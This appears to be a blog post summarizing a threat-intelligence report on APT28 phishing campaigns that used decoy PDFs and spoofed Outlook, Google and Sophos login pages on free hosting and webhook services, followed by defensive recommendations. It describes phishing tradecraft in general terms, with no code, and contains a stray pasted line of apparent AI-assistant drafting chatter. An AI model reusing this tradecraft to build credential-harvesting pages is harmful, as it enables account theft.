top of page
Buscar

Russian APT28 Hunts Credentials Across Energy and Policy Networks

  • Foto del escritor: Javier Conejo del Cerro
    Javier Conejo del Cerro
  • hace 4 horas
  • 3 Min. de lectura

Credential theft does not always arrive with malware or exploits. Sometimes it walks through the front door, wearing familiar logos and carrying legitimate documents. In a series of campaigns observed throughout 2025, the Russia-linked threat actor APT28 (BlueDelta) has demonstrated how low-noise phishing, combined with trusted infrastructure and subtle redirection, can yield high-value intelligence access across energy, policy and government-adjacent organizations. The operation underscores how credential harvesting remains one of the GRU’s most effective and cost-efficient espionage tools.


Phase 1 — Targeted Trust Building


APT28 focused on a small but carefully selected victim set, including individuals tied to a Turkish energy and nuclear research agency, a European think tank, and organizations in North Macedonia and Uzbekistan. The targeting reflects clear intelligence priorities: energy research, defense cooperation, and government communication networks relevant to Russian strategic interests.

Lures were regionally and professionally tailored, including Turkish-language content and policy-focused messaging. Rather than generic phishing, victims were approached with material aligned to their expertise, increasing credibility and reducing suspicion.


Phase 2 — Legitimate Content as a Decoy


The attack chain typically began with a phishing email containing a shortened link. Once clicked, victims were briefly shown legitimate PDF documents, such as a Gulf Research Center publication on the Iran–Israel conflict or a Mediterranean policy briefing from ECCO.

This decoy stage lasted only seconds, but it served a critical purpose: establishing authenticity before the real attack unfolded. By leveraging genuine, publicly available documents from reputable institutions, the attackers lowered the victim’s guard at precisely the right moment.


Phase 3 — Credential Harvesting via Trusted Infrastructure


After the decoy, victims were silently redirected to spoofed login pages mimicking well-known services, including:

  • Microsoft Outlook Web Access (OWA)

  • Google authentication portals

  • Sophos VPN login and password reset pages

These phishing pages were hosted using legitimate but disposable internet services, such as webhook[.]site, InfinityFree, Byet Internet Services, and ngrok. Embedded JavaScript handled multiple actions simultaneously: confirming page access, capturing submitted credentials through hidden HTML form elements, exfiltrating the data to webhook endpoints, and then redirecting victims back to the real service.

This final redirection was key. Because users ultimately landed on the genuine login page or document, many remained unaware their credentials had already been stolen.


Phase 4 — Data Compromised and Operational Impact


The stolen information included usernames, passwords and associated account identifiers, enabling attackers to access:

  • Email mailboxes

  • VPN portals

  • Internal collaboration and communication systems

With valid credentials in hand, APT28 could conduct follow-on intelligence collection, internal reconnaissance, and long-term monitoring without deploying malware. The same core technique was reused across multiple campaigns in April, June, September and February 2025, demonstrating a sustained and repeatable operational playbook.


Phase 5 — Attribution and Strategic Pattern


Recorded Future attributes the activity to APT28 (BlueDelta), a GRU-linked threat actor with a long history of credential harvesting. The campaigns align with earlier operations against UKR[.]net users and mirror APT28’s consistent reliance on low-cost, high-yield phishing rather than exploit-heavy intrusion chains.

The abuse of free hosting platforms and webhook services highlights a deliberate strategy: infrastructure that is easy to replace, difficult to blacklist pre-emptively, and trusted by default within enterprise environments.

Perfecto, Javi. Aquí tienes la sección de medidas de defensa en bullet points y unas conclusiones claras y publicables, alineadas con el tono técnico-narrativo de la blog entry.


Measures to Defend Against Credential Harvesting Campaigns


  • Enforce phishing-resistant MFA (FIDO2 or certificate-based) on email, VPN and cloud services to neutralize stolen passwords.

  • Monitor for suspicious redirections involving URL shorteners, webhook services, ngrok, InfinityFree or similar disposable hosting platforms.

  • Deploy conditional access policies to flag or block logins following unusual referral chains or rapid redirect sequences.

  • Educate users to treat unexpected document links and login prompts as high-risk, even when content appears legitimate.

  • Restrict exposure of legacy or password-only authentication on Outlook Web Access, VPN portals and webmail interfaces.

  • Continuously audit credential reuse across services and enforce regular password rotation for high-risk roles.


APT28’s campaigns highlight how credential harvesting remains a low-noise, high-impact espionage technique. By abusing legitimate documents, trusted infrastructure and seamless redirection flows, attackers bypass technical defenses and rely on user trust instead of malware.

The absence of exploits or payloads does not reduce the severity of the compromise. Once credentials are stolen, attackers gain persistent, covert access to sensitive communications and internal systems, often without triggering alerts.


As long as authentication workflows remain human-driven and password-dependent, credential phishing will continue to be a primary entry point for state-sponsored actors. Defensive strategies must therefore prioritize identity protection as a critical security perimeter.



The Hacker News


 
 
 

Comentarios

bottom of page